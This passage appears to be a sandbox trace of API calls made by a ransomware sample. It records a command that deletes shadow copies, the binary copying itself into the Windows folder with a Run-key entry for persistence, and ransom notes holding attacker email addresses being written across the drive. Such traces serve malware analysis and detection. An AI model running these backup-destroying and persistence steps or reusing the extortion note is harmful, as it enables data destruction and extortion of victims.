hStdError=0x0), lpProcessInformation=0x18de0c | out: lpCommandLine="/C wmic SHADOWCOPY DELETE", lpProcessInformation=0x18de0c*(hProcess=0x370, hThread=0x36c, dwProcessId=0x894, dwThreadId=0x88c)) returned 1 [0098.655] CloseHandle (hObject=0x370) returned 1 [0098.655] CloseHandle (hObject=0x36c) returned 1 [0098.655] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18da1c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csrhdp.exe")) returned 0x30 [0098.655] GetWindowsDirectoryW (in: lpBuffer=0x18dc28, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0098.655] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\csrhdp.exe" | out: lpString1="C:\\Windows\\csrhdp.exe") returned="C:\\Windows\\csrhdp.exe" [0098.655] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csrhdp.exe"), lpNewFileName="C:\\Windows\\csrhdp.exe" (normalized: "c:\\windows\\csrhdp.exe"), bFailIfExists=0) returned 1 [0098.666] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18de34 | out: phkResult=0x18de34*=0x370) returned 0x0 [0098.667] lstrlenW (lpString="C:\\Windows\\csrhdp.exe") returned 21 [0098.667] RegSetValueExW (in: hKey=0x370, lpValueName="csrhdp.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\csrhdp.exe", cbData=0x2b | out: lpData="C:\\Windows\\csrhdp.exe") returned 0x0 [0098.667] RegCloseKey (hKey=0x370) returned 0x0 [0098.668] GetConsoleWindow () returned 0x301ea [0098.668] ShowWindow (hWnd=0x301ea, nCmdShow=0) returned 1 [0098.670] GetLogicalDriveStringsW (in: nBufferLength=0x400, lpBuffer=0x18da1c | out: lpBuffer="C:\\") returned 0x4 [0098.670] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.670] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x18) returned 0x3006d8 [0098.670] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.670] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.670] lstrlenW (lpString="C:\\") returned 3 [0098.671] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x18de24 | out: lphEnum=0x18de24*=0x317348) returned 0x0 [0099.148] WNetEnumResourceW (in: hEnum=0x317348, lpcCount=0x18de28, lpBuffer=0x185e08, lpBufferSize=0x18de20 | out: lpcCount=0x18de28, lpBuffer=0x185e08, lpBufferSize=0x18de20) returned 0x0 [0099.148] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x185e08, lphEnum=0x185de4 | out: lphEnum=0x185de4*=0x343070) returned 0x0 [0099.347] WNetEnumResourceW (in: hEnum=0x343070, lpcCount=0x185de8, lpBuffer=0x17ddc8, lpBufferSize=0x185de0 | out: lpcCount=0x185de8, lpBuffer=0x17ddc8, lpBufferSize=0x185de0) returned 0x103 [0099.347] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x185e28, lphEnum=0x185de4 | out: lphEnum=0x185de4*=0x7) returned 0x4b8 [0116.357] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x185e48, lphEnum=0x185de4 | out: lphEnum=0x185de4*=0x7) returned 0x4c6 [0116.360] WNetCloseEnum (hEnum=0x317348) returned 0x0 [0116.360] GetCurrentProcess () returned 0xffffffff [0116.360] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0116.360] GetProcessHeap () returned 0x2e0000 [0116.360] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x301d70 [0116.360] lstrcatW (in: lpString1="", lpString2="." | out: lpString1=".") returned="." [0116.360] lstrcatW (in: lpString1=".", lpString2="12781717671972518758" | out: lpString1=".12781717671972518758") returned=".12781717671972518758" [0116.360] lstrcatW (in: lpString1=".12781717671972518758", lpString2="." | out: lpString1=".12781717671972518758.") returned=".12781717671972518758." [0116.360] lstrcatW (in: lpString1=".12781717671972518758.", lpString2="ex_parvis@aol.com" | out: lpString1=".12781717671972518758.ex_parvis@aol.com") returned=".12781717671972518758.ex_parvis@aol.com" [0116.360] lstrcatW (in: lpString1=".12781717671972518758.ex_parvis@aol.com", lpString2=".AIR" | out: lpString1=".12781717671972518758.ex_parvis@aol.com.AIR") returned=".12781717671972518758.ex_parvis@aol.com.AIR" [0116.360] lstrlenW (lpString=".12781717671972518758.ex_parvis@aol.com.AIR") returned 43 [0116.360] lstrlenW (lpString="6BZ15llTpdeTMlSTBopEuMenQYpltjsuVxdS+XvY/b+atKNQCMrbJvLUzFuZrK1Xdc8ul5Wb2EX9peTZ78tQM4KtubwmRN88WpuWKtBUudidgIuVf+a2aceysKmi++KXUwQP0UeM1yeEPUAF56UmLMlZysks/SoJDShu9fZVbF/miAE8Clc1UYFSOFNZ3qxPlm9l3TFlKLxUWKuUDNqTFQvrjbVG7Ew4tlx9Zi4R1ElyxqkyNTJOAsdQkGQT8j7WmQboqgxsPHQ2EijjHuHzxHKfwBiwz1ZNR0UUlhl21OVjsCyVhVt0w8ELVpXCBLjYrNaE7lkuMJH/7+2GAWvc7+0lqqnsqYXwjeDB1pgoCcz/kQD1hEdxJigl5W+uvxRmfNhrCfqwSS7PiLGjk9oh9SnJLCC0/ZMDJWueHKWpSWAsrRqBMnnzbK0fFYHLC+wNKDYUR8JjZrltyGFpWMWT6L/R224DtdXxIpWCASCeT1BFXullJJobOYhU+a/2+IgtmBPgYL5o5XvBMbKfAMHVZGQpBND4+lHngwlQ0WIMoDSbvEqTOrgcnSCkBpBL4Jz/zeRuw7ylOLdxBBv/IPAkQdig/m/cJqyM+ajq0Ea2n+sxQ3UQvi+k8dSHQ14EUf+rJWx+cbIVjGw9RPpg5/TYKW8t5S/SdozIy5DL+U18mzoKIVsa91Wk4LxyxOD94sJd4cifgkyVk4+wv4+VclOVtLHjsHFte2IFwwo9cNr6BJ/EDTBbgeUlrWmhtzglt9unxKovNSWUN9DhYYUxkrb7PkMaklGCQnvepxVU/0fpa1O4+GpKa340sZGYqZFkXP326oDPotWiK8e8h2OQWWBHfyQhS4eJdefMuYpD4z2m2pHs19wr7kBs91LQMY0wrVZ1sZWH13eQUjJKWxt7NDu6HFZBo7u2lNTvE6gS/UbZKRNXYsNwYsORNYTqDrUhtgMs7m2EXhoHESHPy+0zZcB5WLzeODOcVW/HVWQYaQ2bGRvaXO4GC5aImEscOoTx8fcl77P7+lOE7MaWKBgniK5AAyBMZcKUXLka6bKt2uAxFL8GLW5LBcaKc5syiFvCJ4uENBcN54ZO3cxi9GNAYCAoMOtArJrWYWVEGu255Ubx6F3GQAWXs0vpKiB/Mmm/lvVsVRaRCQR0XHj8VbCcz/ro3ciAdNv9yg+CitNwaTT8t7bpgoDRsYz6XKCNpTMK0hcwQ5g11ZuU33n9Xjr2zNWdOjy2xpL9U25RUhdtw0KCHR/EVdgC1A4QmiS46dAkcLuTFNN21KL4XpTyeU66y6j1titr4XugYE8G7HnSofjkP7iJ+o25a0LvIWePyhR73P9GgvRSwCkZyYHorNEEje2VUWjfbJoIbM9Jzd2+pd03YfH0ombtEXh+K7GgNWgZzcVxx2aZcdk9ycN/ykDRtTmGjIIiKlTdY+DwC4lV3PJKiWKVUoPhbZ3KqZGnSMt2C+fBUwpMKhh2M4jdwdBD0RLbpKlzHFFcJ38krmswKq84jnUzHsyWckuj5l+ytsVON6B9Wayq0emJcacJlNrfHaCRdlHeg+eqkyuev4yfLP/eLcebWU9eE9zidkqLaioqhw66kvBrZFg7ychM1FaVuCWtgyRjQXmnfxU9v26a3UgrQ1Xq7ncNXkcgA7NF1NxqZIh+LYSwxpvKS/PPJT2XCWc3Yw2H33EI+hin8MuXOrDft6PsS4flpF59SRVW6ONuJsD8fgGUIxvlx2EP7WFUiTXWOdPh7gBDiVuLbwpPOFApM5Q4Nn5DsPAdxURG8/8ikIETQQxlb/vPpHWNc6FicmttOLI0kpr7XnOA6oKL91yiGcn4l92Xds5Tv3kdt5h7S/WAD52N7yovrunI152GadsKLAQ72QOkkXq2NIxTSY6Ru+prJ3He5FeQrhGue7PBF5Fde/9rf+xshlJSa34LzkpQ") returned 1940 [0116.360] GetProcessHeap () returned 0x2e0000 [0116.360] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1fa0) returned 0x348ed8 [0116.360] lstrcpyA (in: lpString1=0x348ed8, lpString2="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address " | out: lpString1="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address ") returned="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address " [0116.360] lstrcatA (in: lpString1="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address ", lpString2="\r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n" | out: lpString1="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n") returned="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n" [0116.360] lstrcatA (in: lpString1="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n", lpString2="\"

Here is you personal id, send it to us


" | out: lpString1="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n\"

Here is you personal id, send it to us


") returned="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n\"

Here is you personal id, send it to us


" [0116.361] lstrlenA (lpString="

Major

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n\"

Here is you personal id, send it to us


") returned 1352 [0116.361] lstrlenA (lpString="\"

Here is you personal id, send it to us


") returned 75 [0116.361] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330998 [0116.361] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x330) returned 0x33cb30 [0116.361] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330898 [0116.361] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x28) returned 0x343e20 [0116.361] RtlInitializeConditionVariable () returned 0x343e24 [0116.361] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x30) returned 0x344500 [0116.361] RtlInitializeConditionVariable () returned 0x344508 [0116.361] GetCurrentThreadId () returned 0x9bc [0116.361] GetCurrentThreadId () returned 0x9bc [0116.361] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x14) returned 0x343170 [0116.362] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x405720, phModule=0x34317c | out: phModule=0x34317c*=0x400000) returned 1 [0116.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x418f0c, lpParameter=0x343170, dwCreationFlags=0x0, lpThreadId=0x18ddc4 | out: lpThreadId=0x18ddc4*=0x978) returned 0x3c8 [0116.362] SleepConditionVariableSRW (in: ConditionVariable=0x343e24, SRWLock=0x344508, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x343e24, SRWLock=0x344508) returned 1 [0116.371] GetCurrentThreadId () returned 0x9bc [0116.371] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.371] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x343e20 | out: hHeap=0x2e0000) returned 1 [0116.371] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a28 [0116.371] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330998 | out: hHeap=0x2e0000) returned 1 [0116.371] GetCurrentThreadId () returned 0x9bc [0116.371] WaitForSingleObjectEx (hHandle=0x3c8, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 2 os_tid = 0x9d0 Thread: id = 3 os_tid = 0x9d4 Thread: id = 4 os_tid = 0x9d8 Thread: id = 5 os_tid = 0x9dc Thread: id = 6 os_tid = 0x9e0 Thread: id = 7 os_tid = 0x9e4 Thread: id = 21 os_tid = 0x9f0 Thread: id = 22 os_tid = 0xa24 Thread: id = 23 os_tid = 0xa38 Thread: id = 162 os_tid = 0x978 [0116.364] GetLastError () returned 0x0 [0116.364] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x364) returned 0x33d078 [0116.364] SetLastError (dwErrCode=0x0) [0116.364] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0116.364] GetLastError () returned 0x57 [0116.364] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0116.365] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0116.365] GetLastError () returned 0x57 [0116.365] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0116.366] GetCurrentThreadId () returned 0x978 [0116.366] GetCurrentThreadId () returned 0x978 [0116.366] RtlWakeConditionVariable () returned 0x1 [0116.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309b8 [0116.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a800 [0116.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2) returned 0x3309c8 [0116.366] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309c8 | out: hHeap=0x2e0000) returned 1 [0116.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2) returned 0x3309c8 [0116.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x44) returned 0x333468 [0116.366] GetLastError () returned 0x7e [0116.366] SetLastError (dwErrCode=0x7e) [0116.366] GetLastError () returned 0x7e [0116.366] SetLastError (dwErrCode=0x7e) [0116.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb8) returned 0x34ae98 [0116.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6a6) returned 0x34ce80 [0116.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34ce80 | out: hHeap=0x2e0000) returned 1 [0116.367] GetLastError () returned 0x7e [0116.367] SetLastError (dwErrCode=0x7e) [0116.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6) returned 0x3309d8 [0116.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2) returned 0x3309e8 [0116.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4) returned 0x3309f8 [0116.367] GetLastError () returned 0x7e [0116.367] SetLastError (dwErrCode=0x7e) [0116.367] GetLastError () returned 0x7e [0116.367] SetLastError (dwErrCode=0x7e) [0116.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb8) returned 0x34af58 [0116.367] GetLastError () returned 0x7e [0116.367] SetLastError (dwErrCode=0x7e) [0116.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6a6) returned 0x34ce80 [0116.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34ce80 | out: hHeap=0x2e0000) returned 1 [0116.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309d8 | out: hHeap=0x2e0000) returned 1 [0116.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34ae98 | out: hHeap=0x2e0000) returned 1 [0116.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.367] GetLastError () returned 0x7e [0116.367] SetLastError (dwErrCode=0x7e) [0116.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6) returned 0x3309f8 [0116.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2) returned 0x3309d8 [0116.367] GetLastError () returned 0x7e [0116.367] SetLastError (dwErrCode=0x7e) [0116.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x200) returned 0x33d3e8 [0116.367] GetLastError () returned 0x7e [0116.367] SetLastError (dwErrCode=0x7e) [0116.367] GetLastError () returned 0x7e [0116.368] SetLastError (dwErrCode=0x7e) [0116.368] GetLastError () returned 0x7e [0116.368] SetLastError (dwErrCode=0x7e) [0116.368] GetLastError () returned 0x7e [0116.368] SetLastError (dwErrCode=0x7e) [0116.368] GetLastError () returned 0x7e [0116.368] SetLastError (dwErrCode=0x7e) [0116.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4) returned 0x330a08 [0116.368] GetLastError () returned 0x7e [0116.368] SetLastError (dwErrCode=0x7e) [0116.368] GetLastError () returned 0x7e [0116.368] SetLastError (dwErrCode=0x7e) [0116.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb8) returned 0x34ae98 [0116.368] GetLastError () returned 0x7e [0116.368] SetLastError (dwErrCode=0x7e) [0116.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6a6) returned 0x34ce80 [0116.368] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34ce80 | out: hHeap=0x2e0000) returned 1 [0116.368] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.368] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34af58 | out: hHeap=0x2e0000) returned 1 [0116.368] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a08 | out: hHeap=0x2e0000) returned 1 [0116.368] GetLastError () returned 0x7e [0116.368] SetLastError (dwErrCode=0x7e) [0116.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6) returned 0x330a08 [0116.368] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309d8 | out: hHeap=0x2e0000) returned 1 [0116.368] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309e8 | out: hHeap=0x2e0000) returned 1 [0116.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309e8 [0116.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309d8 [0116.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a828 [0116.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a738 [0116.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a878 [0116.369] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a878 | out: hHeap=0x2e0000) returned 1 [0116.369] FindFirstFileW (in: lpFileName="C:\\\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x36, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x317348 [0116.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.369] GetLastError () returned 0x7e [0116.369] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0116.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x28) returned 0x343e50 [0116.369] SetLastError (dwErrCode=0x7e) [0116.369] GetLastError () returned 0x7e [0116.369] SetLastError (dwErrCode=0x7e) [0116.369] GetLastError () returned 0x7e [0116.369] SetLastError (dwErrCode=0x7e) [0116.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a878 [0116.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8a0 [0116.370] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a878 | out: hHeap=0x2e0000) returned 1 [0116.370] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8a0 | out: hHeap=0x2e0000) returned 1 [0116.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8a0 [0116.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.370] GetLastError () returned 0x7e [0116.370] SetLastError (dwErrCode=0x7e) [0116.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.370] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.370] GetLastError () returned 0x7e [0116.370] SetLastError (dwErrCode=0x7e) [0116.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x50) returned 0x324b98 [0116.370] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\TRY_TO_READ.html" (normalized: "c:\\$recycle.bin\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.372] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.372] WriteFile (in: hFile=0x3d0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.373] WriteFile (in: hFile=0x3d0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.373] WriteFile (in: hFile=0x3d0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.373] CloseHandle (hObject=0x3d0) returned 1 [0116.374] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.374] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.374] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.375] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.375] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x36, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0116.375] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.375] GetLastError () returned 0x0 [0116.375] SetLastError (dwErrCode=0x0) [0116.375] GetLastError () returned 0x0 [0116.375] SetLastError (dwErrCode=0x0) [0116.375] GetLastError () returned 0x0 [0116.375] SetLastError (dwErrCode=0x0) [0116.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a878 [0116.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8c8 [0116.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8f0 [0116.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.375] GetLastError () returned 0x0 [0116.375] SetLastError (dwErrCode=0x0) [0116.375] GetLastError () returned 0x0 [0116.375] SetLastError (dwErrCode=0x0) [0116.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.375] CreateFileW (lpFileName="C:\\\\Boot\\TRY_TO_READ.html" (normalized: "c:\\boot\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.376] HeapFree (in: hHeap=0x2e0000, 